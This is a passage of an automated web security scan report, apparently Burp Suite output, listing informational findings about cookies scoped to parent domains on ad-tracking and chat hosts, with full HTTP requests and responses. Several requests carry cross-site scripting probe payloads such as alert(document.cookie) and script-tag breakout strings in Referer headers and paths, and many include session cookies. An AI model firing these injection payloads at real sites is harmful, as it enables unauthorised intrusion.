pRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: fc=4eSwQ3g1tAr0ps2Jsn-_eWoVwDvXeel54vyZXm8QLISGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOemGrp6DlmlaGmQt2qcOx1gg; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Set-Cookie: pf=xRx_CDsAoWoco5w3DRjwyiu1jndAIQSkfSH7IRm-hA2JwV9kSIzX4BtZ7vBDkFqiIdgy2Lx6nc2yvIrh5BEVs34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 17:37:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 17:37:28 GMT
Content-Length: 9353


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

10.24. http://ad.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=6 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15001%7C15001%7C15001%7C15001%7C15001%7C15002%7C15002%7C14983%7C15002; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 14:48:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 14:48:47 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=4510090875291133304&fpid=6&nu=n&t=
...[SNIP]...

10.25. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d791689/21/39823749/decide.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d791689/21/39823749/decide.php?ord=1296226106 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:41 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Thu, 28 Jan 2010 14:48:40 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; expires=Tue, 20 Mar 2012 06:48:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; expires=Tue, 20-Mar-2012 06:48:41 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.26. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296224089.327,wait-%3E10000,&1296224142212 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_G=method->-1,ts->1296224088; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:50 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.27. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=59007464&AR_C=38601779 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p85001580=exp=21&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 01:19:48 2011&prad=58087454&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296263988%2E989%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 29 Jan 2011 01:32:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; expires=Fri 29-Apr-2011 01:32:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27557

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"59007464",Pid:"p45555483",Arc:"38601779",Location:CO
...[SNIP]...

10.28. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 14:14:48 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; expires=Thu 28-Apr-2011 14:14:48 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296224088; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26257

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401349",Location:CO
...[SNIP]...

10.29. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p83612734&PRAd=57555319&AR_C=39967551 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=10&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 21:57:55 2011&prad=58087444&arc=40400763&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296251875%2E953%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 22:52:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; expires=Thu 28-Apr-2011 22:52:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24910

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57555319",Pid:"p83612734",Arc:"39967551",Location:CO
...[SNIP]...

10.30. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:12:05 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:12:05 GMT
location: http://www.247realmedia.com
Set-Cookie: id=9272912264837465719; expires=Sat, 28-Jan-2012 14:12:05 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9272912264820689035; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


10.31. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6135404&rn=534961991&c7=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&c3=15&c4=7477&c10=3182236&c8=Page%20Not%20Found&c9=http%3A%2F%2Fburp%2Fshow%2F4&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 28 Jan 2011 14:14:32 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 14:14:32 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.32. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=desoundings&d.x=31314505&d.t=page&d.u=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x00241B%29%253C%2Fscript%253E HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 28 Jan 2011 15:00:13 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Sun, 27-Jan-2013 15:00:13 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.33. http://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?&site=5296924&cmd=mTagStartPage&lpCallId=388698517112-580234512686&protV=20&lpjson=1&page=http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-english&activePlugin=none&cobrowse=true&PV%21MktSegment=&PV%21unit=sales&PV%21Section=SEOLanding&PV%21CampaignCode=&PV%21pageLoadTime=4%20sec&PV%21visitorActive=1&SV%21language=english&title=Live%20Chat%20by%20LivePerson&cookie=visitor%3Dvarid%3Dbing%26ref%3Dbing%2Bcpc%2B%2Bchat%2B%252Dus%3B%20ASPSESSIONIDQSDTDCQS%3DICGJONICHIIHMLMANIPEDEIG%3B%20__utmz%3D1.1296223198.1.1.utmcsr%3Dbing%7Cutmccn%3Dchat%2520-us%7Cutmcmd%3Dcpc%3B%20__utma%3D1.925961970.1296223198.1296223198.1296223198.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1296223198 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 13:59:14 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"388698517112-580234512686","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.34. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/5296924/?lpCallId=1296223666173-668&lpjson=2&cmd=visitorEvents&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=primary; LPit=true; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LPit=false; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 893

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu
...[SNIP]...

10.35. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

